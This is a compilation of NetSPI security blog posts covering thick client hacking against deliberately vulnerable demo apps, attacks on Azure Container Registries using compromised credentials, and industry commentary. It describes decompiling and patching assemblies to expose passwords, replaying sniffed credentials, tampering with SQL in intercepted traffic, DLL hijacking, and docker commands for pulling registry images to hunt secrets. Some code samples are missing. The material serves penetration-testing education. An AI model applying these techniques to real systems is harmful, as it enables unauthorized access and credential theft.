Introduction to Hacking Thick Clients: Part 4 – The Assemblies

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The Filesystem and Registry
  4. The Assemblies
  5. The API
  6. The Memory

Assembly Controls

Libraries and executables can be compiled with some additional security measures to protect against code exploitation:

  • Address Space Layout Randomization (ASLR) – An application’s locations in memory are randomized at load time, preventing attacks such as return-to-libc that lead to code execution by overwriting specific addresses.
  • SafeSEH – A list of safe exception handlers is stored within a binary, preventing an attacker from forcing the application to execute code during a call to a malicious exception.
  • Data Execution Prevention (DEP) – Areas of memory can be marked as non-executable, preventing an attacker from storing code for a buffer overflow attack in these regions.
  • Authenticode/Strong Naming – Assemblies can be protected by signing. If left unsigned, an attacker is able to modify and replace them with malicious content.
  • Controlflowguard – An extension of ASLR and DEP that limits the addresses where code can execute from.
  • HighentropyVA – A 64 bit application uses ASLR.

Thankfully, NetSPI’s very own Eric Gruber has released a tool called PESecurity to check if a binary has been compiled with the above code execution preventions. Many of the thick client applications we test have installation directories filled to the brim with assemblies, and PESecurity is especially useful for checking a large number of files.

In the below example, PESecurity is used to check BetaBank.exe. It is compiled with ASLR and DEP. SafeSEH is only applicable for 32 bit assemblies. But the executable is unsigned.

Pesecurity Betabank


Decompiling is one of my favorite parts of testing thick clients. As someone who has made far too many programming mistakes, it’s cathartic to find those of other programmers. By their very nature, .Net assemblies can be read as source code using tools such as the following:

This is because .Net assemblies are managed code. When a .Net application is compiled, it’s compiled to Intermediate Language code. Only at runtime is Intermediate Language code finally compiled to machine code by a runtime environment. .Net assemblies are so easy to “reverse” into source code because the Intermediate Language contains so much information such as types and names.

Unmanaged code, such as C or C++, is compiled down to a binary. It doesn’t run through a runtime like C# does with Common Language Runtime – it’s loaded directly into memory.

Information Disclosures

Managed Code

The following example will use the aforementioned BetaBank.exe, found in our BetaFast GitHub. It will also be using dnSpy as the decompiler of choice.

One of the first things I look for when testing a thick client application is hardcoded sensitive information such as credentials, encryption keys, and connection strings. Decompiling isn’t even required to find sensitive information – configuration files are great places to look. When a .Net assembly is run, it may search a configuration file for global values such as a connection string, web endpoints, or passwords that are referenced in the executable. Procmon and the steps outlined in the previous entry are very useful for identifying these files. There’s a connection string stored right in the Beta Bank’s config file. This can be used to authenticate directly to the database using a tool such as SQL Server Management Studio.


If you’re wondering about the address, that’s the VM I’m running Docker in.


But for information disclosures in the source code, first decompile any of the application’s binaries. BetaBank.exe is loaded into dnSpy.


dnSpy has a solid search feature. I type in terms like “key,” “IV,” “connection,” “password,” “encrypt,” and “decrypt” to look for how the application handles encryption, authentication, and database connections. The application also has a filter in its search function. Below, I limited the search to only the Selected Files, but a search can also be limited to specific libraries and object types. Looks like there’s a hardcoded key in BetaBank.ViewModel.RegisterViewModel and BetaBank.ViewModel.LoginViewModel.


And searching for “password” shows a hardcoded encrypted password. Apparently the developer(s) implemented an authorization check on the client side. The username “The_Chairman” is directly compared to the value in the Username textbox, and the encrypted password is directly compared to the encrypted value of the value in the Password textbox.


The BetaEncryption class can be decompiled, showing some very custom encryption logic.


Unmanaged Code

As I mentioned at the beginning of this section, it’s not possible to have such a clean look at the source code when testing unmanaged code. Instead, we once again look to the CTO of Microsoft Azure for help. Strings is a tool in the Sysinternals suite that will output a list of strings saved in an executable. When analyzing memory dumps or unmanaged code binaries, I will retrieve the list of all the strings (most of them will probably look like nonsense), and then search for key terms like the ones above in a text editor of choice.

Modifying Assemblies

Using dnSpy, a class can actually be modified, and the binary can be recompiled. Below, I’ve reversed the Encrypt function, and I use a MessageBox to show the decrypted adminPassword when a user successfully authenticates to the application.

Dnspy E

Saving the module as a new executable . . .


Finally, when I authenticate as a user, the MessageBox prints The_Chairman’s password.


A MessageBox is very useful to add to the application when trying to gather information. It’s like when I use a print statement instead of a debugger.

A Beta Bank developer may decide to patch this vulnerability by removing the hardcoded encryption key. However, Beta Bank’s custom encryption can still be reverse engineered to gather the key for decryption. Below, I’ve added a function that performs an XOR on the plaintext password and the encrypted password, thus exposing the encryption key. In the Decrypt function, I retrieve the key by passing a known plaintext password (my own) and its encrypted value.


But that was actually too much work. If we don’t need The_Chairman’s password for later, the username and encrypted password can just be placed directly into the Login function. Boolean logic can also be modified so that anything verified server-side, such as IsAdmin(), can be modified to always return true.



Source code isn’t often this legible. Sometimes, code is obfuscated. And while there’s no security through obscurity, it sure does make the job of a security consultant a little more difficult.

Below is the BetaEncryption class from earlier after I applied some custom obfuscation by mashing my keyboard to rename the class, methods, and parameters.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

public static class jinjnhglkjd
    public static string dsfggd(byte[] erttr, string dgfhfgi)
        byte[] plaintextBytes = Encoding.ASCII.GetBytes(dgfhfgi);

        byte[] ciphertextBytes;

        int messageLength = plaintextBytes.Length;

        while (messageLength % erttr.Length != 0)
            Array.Resize(ref plaintextBytes, plaintextBytes.Length + 1);
            plaintextBytes[plaintextBytes.Length - 1] = 0x00;
            messageLength += 1;

        ciphertextBytes = new byte[messageLength];
        int startingIndex = 0;
        for (int i = 0; i < (messageLength / erttr.Length); i++)
            for (int j = 0; j < erttr.Length; j++)
                ciphertextBytes[j + startingIndex] = Convert.ToByte(plaintextBytes[j + startingIndex] ^ erttr[j]);
        return Convert.ToBase64String(ciphertextBytes);

All of the functionality is still there. Some obfuscation techniques may go even further to make code illegible. But what this does is makes it more difficult to search through and reverse engineer the source code. The Assembly Explorer of dnSpy would be full of nonsense class names, and searching for specific terms such as “Encrypt” would not yield any results.

There are various tools for deobfuscation such as de4dot. Below is an example of what a deobfuscator may interpret my keyboard mashing obfuscation as. The classes at least have some sense of legibility, and methods are named some variation of method rather than dsfggd.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

public static class class_1
    public static string method_1(byte[] byte_1, string string_1)
        byte[] plaintextBytes = Encoding.ASCII.GetBytes(string_1);

        byte[] ciphertextBytes;

        int messageLength = plaintextBytes.Length;

        while (messageLength % byte_1.Length != 0)
            Array.Resize(ref plaintextBytes, plaintextBytes.Length + 1);
            plaintextBytes[plaintextBytes.Length - 1] = 0x00;
            messageLength += 1;

        ciphertextBytes = new byte[messageLength];
        int startingIndex = 0;
        for (int i = 0; i < (messageLength / byte_1.Length); i++)
            for (int j = 0; j < byte_1.Length; j++)
                ciphertextBytes[j + startingIndex] = Convert.ToByte(plaintextBytes[j + startingIndex] ^ byte_1[j]);
        return Convert.ToBase64String(ciphertextBytes);

Obfuscation doesn’t secure code. But it makes browsing the source code all around more of a headache than reading someone else’s large codebase typically is.


Why Organizations Should Think More Holistically About Preparing for and Responding to a Security Breach

In a recent episode of Agent of Influence, I talked with Sean Curran, Senior Director in West Monroe Partners’ Technology Practice in Chicago. Curran specializes in cybersecurity and has over 20 years of business consulting and large-scale infrastructure experience across a range of industries and IT domains. He has been in the consulting space since 2004 and has provided risk management and strategic advice to many top-tier clients. Prior to consulting, Curran held multiple roles with National Australia Bank.

I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music or wherever you listen to podcasts.

Cybersecurity Challenges of COVID-19

From Curran’s perspective, the COVID-19 pandemic has created a lot of challenges for organizations, many of which weren’t prepared for this situation. For example, some organizations primarily used desktop computers and now their employees are being asked to work from home without laptops, which is particularly hard at a time when hardware is difficult to source.

In addition, many companies had processes in place that they never tested – or their processes were too localized. While many companies are prepared to withstand a disaster in one location – for example, Florida in case of a hurricane – COVID-19 has affected the entire world, and organizations weren’t prepared to withstand that. The widespread global impact is why most companies’ disaster recovery and business continuity plans are failing.

The same thing goes for cyberattacks – they aren’t localized to a particular building or region, which is a challenge when most companies are only set up to lose a single building or a single data center.

As during other similar situations, we have seen an increase in cyberattacks during the COVID-19 pandemic, meaning organizations are not only having to implement their business continuity plans on a very broad scale, but also ensure cybersecurity during a heightened period of attacks.

What Makes an Organization Prone to a Security Breach?

People. Budget. And more. Sometimes it’s just that the organization is focused on the wrong things. Or they still believe that security is the security team’s responsibility – but it’s everyone’s responsibility.

Curran has seen organizations with a small number of employees and low budgets do some really amazing things, showing it comes down to the capability of the individuals involved and how interested they are in security.

Organizations also need to strike a balance of protecting themselves from old attack methods while thinking about what the next attack method might be. Attackers are very good at figuring out what security teams are looking at, ignoring it, and moving on to the next delivery mechanism. At the same time, ignoring an old attack method isn’t necessarily the right approach either because we do see attackers re-using old schemes when people have moved on and forgotten about it – or combining several old attack methods into a new one.

Key Steps After a Breach

It’s critical to first understand the point at which your employee fell victim to the virus. The day the antivirus program alerts you that you have a virus isn’t necessarily the day you got the virus.

Then you need to understand what the virus did when someone clicked on a link. Was it credential stealing or malware dropping?

To understand this, you can use toolboxes, which allow you to drop an email, an application or point to a website, and the toolbox will tell you what the virus did. Curran uses a tool called Joe’s Sandbox.

Once you understand what the virus did, you can determine next steps. For example, if it was credential stealing, you need to think about what those user credentials have access to. It’s critical to think holistically here – if the user gave away internal credentials, are they re-using those for personal banking platforms or a Human Resources Information System (HRIS)? People tend to think myopically around active directory, but Curran argues that we need to start thinking beyond that, especially as we start using cloud services.

Curran pointed out that social communication is happening on almost every platform, including Salesforce, Slack, and more. Everything has a social component to it, meaning also that there’s a new delivery mechanism that attackers could start to use.

It’s critical for organizations to start thinking more holistically about how they prepare for and respond to a security breach. For many organizations, the COVID-19 pandemic has created a perfect storm of trying to implement business continuity plans that weren’t tested or up to the task, while also ensuring security during a heightened time of cyberattacks.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.


Introduction to Hacking Thick Clients: Part 3 – The File System and Registry

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The File System and Registry
  4. The Assemblies
  5. The API
  6. The Memory

Information Disclosure

Many applications have been written by developers who could not resist the sweet siren song of storing sensitive information in the file system and/or registry. This has included social security numbers, credit card numbers, database connection strings, credentials, etc. Developers may encrypt this data for an added sense of security, but there could be an insecure or custom encryption implementation. If it is a necessity to store encrypted data, the key must always be stored in a separate location, such as securely in a database.

Focusing the Test

Testing for information disclosures in the file system and registry is quite simple – you just need to look at the files and registry keys used by the application and make sure there isn’t any sensitive information there. But applications often make an insane number of calls to files and registry keys. That’s why it is crucial to focus on the areas of the application most likely to write or read sensitive data.


If it’s possible to test the installation, always use this as an opportunity to look for writes to the file system or registry. It’s the perfect time for data to be written that the application will later read. Will the application be connecting to a database? Maybe the installation process writes the database connection string to a registry key. Maybe default administrator credentials are being stored in the file system.


In the actual application, identify functional areas that may create or modify sensitive information. This always includes the initial database connection and a login form. Plenty of applications save some information for a Remember Me function, so determine how that’s being stored and retrieved. In the authenticated portion of the application, look for areas that specifically handle sensitive data.

Tools and Examples

The Sysinternals suite contains many helpful tools for testing Windows applications. The two tools I will be highlighting are AccessEnum and Process Monitor, written by the CTO of Microsoft Azure. The vulnerable application I will be highlighting is BetaFast, written by the owner of 32 Arnold Schwarzenegger movies.


Process Monitor will try and show you more information than you thought was possible, so the first step is to set up a filter. One item that Process Monitor can filter by is the PID of the application you’re testing, so be sure to check for that in Task Manager.


In this example, I also filtered by Event Class.

Procmon Filter

When opening BetaFast, a login form with a Remember Me function is immediately displayed.

Betafast Rememberme

With Process Monitor running, authenticate to the application and allow it to remember your credentials. Notice that two RegSetValue operations are performed – one for a username, another for a password. Also note how many events actually took place there but were ignored thanks to the filter.

Procmon Credentials

The registry paths might not be as obvious as CredentialsPassword, so it’s more important to look for specific operations rather than paths. Registry Editor can be used to view the paths from the previous step, displaying cleartext credentials.

Registry Credentials

AccessEnum allows us to determine who can read and write registries and directories. The Credentials registry can only be read by Administrators and NT AUTHORITYRESTRICTED. Since this is in HKEY_CURRENT_USER, these credentials would only be exposed to highly privileged accounts and the current user. But they would still be exposed.

Accessenum Registry
File System

BetaFast also has a payment details form. Process Monitor can analyze what the Load Payment Details button is attempting to load.

Load Payment Details

The application is looking for a file in C:ProgramDataBetaFastPaymentDetails with the current user’s name.

Procmon Load Payment Details

The next step is to submit the form with Save Payment Details checked and see what’s happening in the file system.

Save Payment Details

Unsurprisingly, the file that Load Payment Details was looking for is now saved.

Procmon Save Payment Details

The file also unsurprisingly contains cleartext credit card information.

Saved Payment Details

AccessEnum shows that everyone can read this file.

Accessenum Filesystem

Of course, this shouldn’t be surprising either. ProgramData is not user specific while the AppData folder is. Storing cleartext sensitive information in AppData would still show up in one of our reports, but it at least wouldn’t be readable by everyone on the system.

DLL Hijacking

This topic could be a blog or two of its own, and we even have one from 2012. But it also has to do with the file system, so it’s worth a brief overview here as well.

  1. Applications will search for DLLs to load.
  2. Some applications will not specify a fully qualified path.
  3. Windows will search a predefined order of directories for this DLL.
  4. Using Process Monitor, an attacker could identify this DLL because the application would be trying to open a .dll file that could not be found.
  5. An attacker could then place a malicious DLL in one of the directories in the search order, causing the application to execute malicious code.

The problem with DLL Hijacking is in step 5. The issue mostly comes down to configuration issues. Microsoft highlights a few different attack scenarios and their severities in this article. They also have an article on how to prevent and identify these attacks. For even more additional reading on attack scenarios, check out this article as well as this one.

The main point I wanted to cover is that file system vulnerabilities don’t just come from writing data – they sometimes stem from what’s being read. Also, Process Monitor is again very useful.

Referenced Articles:


Challenges and Keys to Success for Today’s CISO from the Former CISO at the CIA

Developing the CISO Role at the CIA

When I started as CISO of the CIA, no one really understood the role or what to do with the CISO. The government had mandated that every government agency had to have one, but as the second CISO of the CIA, it was evident when I took the role that there weren’t clear guidelines around my responsibilities in the organization. While we were an element in the overall security program with the agency, there was the classic argument about if I reported to the CIO or the Chief of Security. Therefore, initially, I was responsible for defining what the CISO role would be and how I could have the greatest influence and impact on the agency.

Over time, the organization grew, and individuals started to see areas where they could rely on the CISO. For example, as we started to use the Internet more broadly and began to consider taking on perhaps more risky technology or operational choices, people in the organization were asking, “Who do we go to, to find out what the risk is?” And that’s when they started to proactively turn to me as the CISO and get me involved.

As CISO, my primary responsibility was defining standards, policies, requirements, and responsibilities, and communicating those throughout the agency. Governance is the not so sexy part of cyber, but it was our primary responsibility to make sure every system we developed and operated met very high levels of security. This included all aspects, from planning, integration, testing, approval, and the standard way you would deliver systems.

The things we were super serious about were critical because we couldn’t make a mistake, so that was the easy part. The hard part was that the risks were high. If you made a mistake – and mistakes were made in judgment, in operations, in support, and in the use of certain technologies – you had to be able to recover from, understand them, learn from them and move on. No one’s perfect and none of our IT systems are perfect, so we had to deal with that issue.

Every system delivered and deployed was a collection of technology, so a lot of planning and thinking about how best to use technology and what things we needed to do to lower our profile and risks went into each project. In large part, I was trying to help senior managers understand what the risks were and make coaching decisions about cyber risk.

I experienced an interesting evolution of involvement in our own IT life (administrative IT and analytical IT) to also becoming more involved in operational use of IT technologies in the whole agency. Later, I also got more involved in strategic planning – looking into the future and what types of cybersecurity skills people would need and what technology we were going to be using.

Biggest Challenges of Being a CISO Today

1. Most Organizations Don’t Do IT Well

The problem in private industries that I see that make a CISO’s life most challenging is that they don’t do IT very well. If an organization doesn’t do IT well, they’re not going to do IT security well. I’ve never seen an organization do IT poorly but do IT security well.

What I mean by “not doing IT well,” is they have no central planning, no central governance, no focus, and no strategy. Everyone in the business is out building their own thing, making their own deals, going to the wrong cloud providers, building their own systems, and making connections with their own vendors. It’s a free-for-all and the poor CISOs are trying to keep track, keep management, and keep control from a security perspective of all this constant noise and constant change in the environment, which they say has to work at the pace of the business because they’re always looking for opportunities to grow the bottom line.

This posture forces CISOs away from good planning and good strategy towards running after the next big opportunity. The business is going to build the application, they’re going to deploy the application, or they’re going to make the deal with the third-party vendor whether the CISO is with them or not because there’s no penalty for not having the CISO with them.

2. The Bulk of a CISO’s Time is Spent on Reactive Projects

A second big problem for most CISOs is that they spend 80 percent of their time on reactive projects versus 20 percent on proactive projects. Even in organizations that are better or more centrally managed where there’s an IT portfolio of known projects and processes, you still have shadow or ghost IT where there’s a risk because of the way most businesses conduct themselves with their IT. The cloud hasn’t helped either. Most of these companies have three, four, five different cloud projects going at the same time across their company, making life very difficult for the CISO and forcing them to spend the bulk of their time being reactive.

Keys to Being a Successful CISO

1. Instill a Sense of Responsibility in Your IT Organization for Cybersecurity

CISOs should instill some sense of responsibility in their IT organization for cybersecurity.

I was working with a company recently where we finally got an agreement with all the senior IT managers of innovation, digital innovation, application development, and systems deployment that each one of them in their performance appraisal, would now have a rating on how well they implement cybersecurity policy and support the cybersecurity program – and the CISO will write that review. We did that because of the way the organization was continually disregarding cybersecurity policy standards. Many knew what they were supposed to do but were disregarding it, so we knew we had to fix that problem first.

You must make cybersecurity part of IT governance.

2. Don’t Focus on Compliance

This is hard, especially for financial services organizations that must comply with various regulations. But when you’re chasing the compliance checklist, you’re usually not focusing on the sophisticated APT (advanced persistent threat) groups. Too often when I go into organizations and find out what they’re doing, they’re working on a variety of cybersecurity projects, mostly because an author came down to their office with that direction and then the next month, came with different direction, and so on. And soon, the organization is working on an odd collection of projects.

But, most importantly, what they’re not focusing on is the real risk and the real risk is sitting in Russia coming up with better attack payloads and techniques. This is what organizations need to be focusing on, much more so than they are today.


Dark Reading: Organizations Conduct App Penetration Tests More Frequently – and Broadly

On May 13, 2020, NetSPI President and COO Aaron Shilts was featured in Dark Reading.

Aaron Shilts, president and chief operating officer at security testing firm NetSPI, says faster software development life cycles and inefficiencies in manual deep-dive penetration testing programs are driving interest in PTaaS.

Organizations are overloaded with traditional pen-test PDF deliverables, many of which can contain a mountain of findings, he says. This has made it difficult for organizations to prioritize, correlate, and drive remediation activities.

“PTaaS is essentially an enriched delivery model, making it easier for customers to consume testing services, from initial scoping to reporting,” he says. “It ultimately helps to accelerate the remediation process.”

Read the full article here.


Introduction to Hacking Thick Clients: Part 2 – The Network

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The File System and Registry
  4. The Assemblies
  5. The API
  6. The Memory


In this post, we’ll cover network testing in thick client applications and how it’s performed on different architectures. BetaFast is written with a three-tier architecture.

  • Tier 1: The client displays and collects data.
  • Tier 2: Web requests are sent to a server where business logic is handled.
  • Tier 3: A database server modifies and retrieves data for the application server.

Beta Bank is written with a two-tier architecture.

  • Tier 1: The client displays and collects data.
  • Tier 2: A database server handles business logic and performs data queries and modifications for the client.

One-tier architecture also exists, but it’s not applicable to this blog post because the client, business logic, and data storage are all on the same system. There can be more than three tiers, but the same methods and tools outlined below will apply.



One of the first things I like to do when I begin a thick client application test is see what’s actually happening on the network. And to do that, I use a tool called Wireshark to capture and filter network traffic.


In this example, I’m testing the Beta Bank vulnerable application. With a proper capture filter in place, I’ll typically begin by just sort of doing things in the thick client. I’ll submit forms, navigate through the app, modify data, etc. Then, I’ll look through Wireshark for anything sensitive.

  • Is the database connection unencrypted?
  • Is sensitive data, such as social security numbers or medical information, transmitted in cleartext?

At one point, I authenticated to the application with the username “blogger.” Searching through the packet list in Wireshark, the name “blogger” appears in a Login procedure. The fact that this is even remotely legible means that the database connection is unencrypted, and anyone with access to this network is able to read this information just as easily. Thankfully, the password appears to be encrypted, so a hacker won’t be able to access my account.


Or will they?!

Any form of a password sent from a client, whether it’s cleartext, hashed, or encrypted, should be treated as the password itself. Sure, the password is encrypted. But knowing and sending this value to the server will authenticate this user to the application. There’s no additional defense provided by only obscuring a parameter value and not securely encrypting an entire transmission. Another value observed through wireshark is the output parameter for the Login procedure – GUID. In an authenticated portion of the application, the procedures accept a GUID as a parameter.


This is what we in the business call a “session ID.” Armed with only this value, an attacker will be able to perform authenticated actions as the blogger user as long as the session remains active.

But even that is making things more complicated than they need to be.

Echo Mirage

In this example, I am the harbinger of revolution –  a veteran of the computer who has had enough of the wealthy elite. While you were smelling the roses, I was sniffing the network. And I captured blogger’s username and encrypted password from that Login procedure.

Now, a tool like Echo Mirage comes in handy. Echo Mirage allows TCP traffic to be intercepted and modified. I can authenticate to the application with the username “blogger” and an arbitrary password, then intercept the packet containing the Login procedure.

Echo Mirage

The encrypted password can be changed to the value captured by Wireshark.

Echo Mirage

As soon as I send this request, I’m in. Let’s see how much money this big shot blogger has.


Hmmm. Perhaps this blogging thing is more of a hobby. Let’s see who else is banking with Beta Bank. Using the techniques from the previous post in the series, the Withdraw button can be enabled.


Wireshark shows that this function is sending a SQL query.


Echo Mirage can be used to directly modify the SQL statement. It can’t change the length of the packet, but the remaining SQL can be commented out.

Echo Mirage Sql

The server responds with the Users table. The account connecting to the database clearly has excessive privileges, but we now have info on every user.


There’s any number of attack vectors now. There’s still much to explore and modify in the database. But The_Chairman sounds very wealthy and very elite, and their encrypted password is practically begging to be used.


Hackers – 1

Wealthy Elite – 0



Burp Suite is perhaps the tool I use most on the job. It’s invaluable for any application assessment that deals with HTTP requests and responses. If you haven’t heard of it or used it, there are going to be far more interesting guides out there than this on how powerful the tool can be.

If a thick client is built on a three-tier architecture, the network portion of the test will essentially be the same as testing a web application. First order of business is proxying the traffic. In the proxy tab of Burp, set up a listener on and a port of choice.


Next, rather than proxying a browser through Burp, proxy the whole system.

Proxy E

There may be a lot of traffic that doesn’t belong to the application being tested. But this is the time for determining which requests are originating from the thick client. I only restrict the scope in Burp once I know the complete set of hosts the app is reaching out to. With BetaFast, I’ve determined the application is only sending requests to

Burp Cart

And now Burp can be used the same as in any web application test. Below, I sent a request to the Repeater tab and found SQL injection.

Burp Sql

Closing Remarks

A lot of important things happen over networks, so make sure not to focus only on the client when testing thick client applications! What could Beta Bank and BetaFast have done differently to protect their systems? Well, a good amount. But here are a few examples:

Beta Bank

  • Encrypt database connections – Encrypted connections hide sensitive data from wandering eyes on a network. They also ensure that traffic cannot be modified as long as the encryption is implemented securely.
  • Principle of least privilege – Since Beta Bank connects to the database as a highly-privileged user, an attacker has free rein of the database should an exploit be found. If the account connecting to the database had the least possible privilege, an attacker could not pivot beyond normal functionality.
  • Salted and hashed passwords – Encryption is by its nature reversible. This will be highlighted further in an upcoming entry in this series.
  • Authentication logic – The password being sent over the network should not be directly compared to the password stored in the database. Otherwise, the encrypted password doesn’t even need to be decrypted or a hashed password cracked. The password should be sent as-is in an encrypted transmission. The server then salts and hashes the password and compares the resultant value to the salted and hashed password stored in the database.


  • Input validation and parameterized queries – Unlike Beta Bank, it’s not an issue that traffic can be intercepted and modified. The issue is that vulnerabilities exist in the way the application server processes input. Anything sent from the client should be validated by the server, and SQL statements should have parameterized queries.

As always, be sure to check out our GitHub for copies of BetaFast and Beta Bank. And be sure to tune in for further guides on hacking thick client applications!


Credit Union Journal: Credit unions must step up cybersecurity during coronavirus

On May 13, 2020, NetSPI Managing Director Nabil Hannan was featured in Credit Union Journal.

As COVID-19 stay-at-home orders begin to lift, people who have the capability to do business from home are being encouraged to do so – and credit unions are no exception.

Throughout the pandemic, organizations have had to put business disaster recovery (BDR) and business continuity plans (BCP) to the test – and in tandem, we’ve seen an increased emphasis on cybersecurity resiliency.

Cybersecurity concerns have risen over the past couple of months as attackers continue to take advantage of the situation. Notably, the Zeus Sphinx banking trojan has returned, phishing attacks are up 350%, and the growing remote workforce has increased the use of potentially vulnerable technologies.

Read the full article here.


Attacking Azure Container Registries with Compromised Credentials

Azure Container Registries are Microsoft’s solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an “Admin user” that shares its name with the registry.


For the purposes of this blog, let’s assume that you’ve compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords, to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.


The credentials will most likely be in a username/password format, with a registry URL attached (

Now that you have these credentials, we’ll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME

If the credentials are valid, you should get a “Login Succeeded”.

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the “_catalog” API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request “”.

Sample PowerShell code:


Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) –

Sample PowerShell code:


To make this whole process easier, I’ve wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry
docker pull
docker pull
docker pull
docker pull
docker pull
docker pull

As you can see above, this script will output the docker commands that can run to “pull” each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it’s a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull
1234: Pulling from dockercore
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for

Fun fact – This script should also work with regular docker registries. I haven’t had a non-Azure registry to try this against yet, but I wouldn’t be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here’s an example command for running a container from the dockercore image with an interactive entrypoint of “/bin/bash”:

docker run -it --entrypoint /bin/bash

*This example assumes bash is an available binary in the container, bash may not always be available for you

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here’s an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR – Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "",
"name": "netspiACR",
"type": "Microsoft.ContainerRegistry/registries"

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated, have the container image name and tag, the “docker pull” process will be the same as above.


Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.


Penetration Testing Paradox: Criteria for Evaluating Pentest Providers

Back in the mid-1960s, computer experts warned of the inevitability of bad actors trying to access information across computer lines. In fact, InfoSec Institute cites that “at the 1967 annual Joint Computer Conference…more than 15,000 computer security experts, government and business analysts discussed concerns that computer communication lines could be penetrated, coining the term [penetration testing or white hat testing] and identifying what has become perhaps the major challenge in computer communications today.”

Fast forward to 2020 and businesses will find that the pentesting industry is made up of a lot of providers offering vulnerability management services. But does that mean all penetration testing services offer the same results? Simply stated, the answer is no. To help organizations choose the right team for their pentesting and vulnerability management (VM) programs, consider the following four paradoxical attributes that should help CISOs and CIOs select a top penetration testing partner.

Pentesting Should be Agile, Yet Consistent Over Time

It’s important to hire a talented penetration testing team – one that’s able to look at the environment through the eyes of an attacker and bring their insights of technical risk to the table as the environment and technology become more complex over time. The pentesting team needs to be agile to continuously improve and evolve to meet the ever-changing and elevated risk and complexities that your business may face.

While evaluating agility, it’s important to also look at consistency. Does your potential pentesting partner have a team orientation versus just an individual, or outsourced consultant, who owns the knowledge? What if that individual moves on to “greener pastures?” It’s my recommendation that you shouldn’t consider a white hat tester who acts alone. Rather, choose a pentesting team built around a consistent delivery of quality, service, and results, that can be an extension of your internal team and will bring you the foundational support you need in your vulnerability management program.

The Pentesting Process Should be Custom Yet Standard

With 640 terabytes of data tripping around the globe every minute, is it possible to put standards around your vulnerability management program? In my opinion, it’s not only possible, it’s a necessity.

